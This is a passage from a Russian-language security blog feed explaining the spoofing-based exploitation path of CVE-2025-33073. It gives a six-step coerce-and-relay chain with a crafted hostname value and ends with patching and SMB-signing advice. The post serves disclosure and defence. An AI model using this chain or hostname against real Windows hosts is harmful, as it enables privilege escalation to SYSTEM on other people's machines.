<p>2️⃣ <strong>Второй вариант со спуфингом </strong><em>(</em><a href="https://sun9-32.userapi.com/s/v1/if2/sFNwiLpO-Nh0me85i7KSiunUhGl8dfGiqsGzTYuOq8sv_7bJVAOPloJWvHVtb47LxnTocvFx6EVeDMsdKeA7Xzcp.jpg?quality=95&#038;as=32x14,48x21,72x31,108x47,160x70,240x105,360x157,480x209,540x236,640x279,720x314,1080x471,1280x559,1440x628,2342x1022&#038;from=bu&#038;cs=2342x0" rel="noopener" target="_blank">скриншот 2</a><em>)</em><strong>:<br />
</strong><br />
1. Атакующий запускает спуфинг с ответом на имя хоста <code>localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA</code></p>
<p>2. Атакующий выполняет Coerce-атаку на устройство в локальной сети.</p>
<p>3. Устройство пытается разрешить имя по DNS, не находит его и переходит к многоадресным протоколам.</p>
<p>4. Атакующий сообщает устройству, что имя принадлежит ему.</p>
<p>5. Устройство проходит аутентификацию на сервере атакующего.</p>
<p>6. Атакующий выполняет Relay-атаку на это же устройство, получает аутентифицированную сессию с правами SYSTEM.</p>
<p>Вместо вывода хочется подчеркнуть, что эта уязвимость стала результатом многолетних исследований нескольких специалистов и, вероятно, кем-то она могла быть обнаружена и использована ранее. Никто не знает, сколько еще таких уязвимостей будет обнаружено. Но в этом случае, как и в большинстве других, применив лучшие практики по защите заранее, можно избежать серьезных последствий при появлении подобных уязвимостей даже без установки обновления.</p>
<p> <strong>Рекомендации по защите от уязвимости:</strong></p>
<p><strong>•</strong> Установите <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073" rel="noopener" target="_blank">обновления безопасности</a> от 10 июня 2025 года.</p>
<p><strong>•</strong> Настройте <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing" rel="noopener" target="_blank">принудительное требование</a> подписи SMB для SMB-служб контроллеров и рабочих станций.</p>
<p>В следующих постах расскажем, как детектить уязвимость 😉</p>
<figure class="wp-block-image"><img width="1024" height="447" src="/wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48-1024x447.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48-1024x447.jpg 1024w, /wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48-300x131.jpg 300w, /wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48-768x335.jpg 768w, /wp-content/uploads/2025/06/photo_306@24-06-2025_18-12-48.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#cve</span> <span class="hashtag">#win</span> <span class="hashtag">#offensive</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
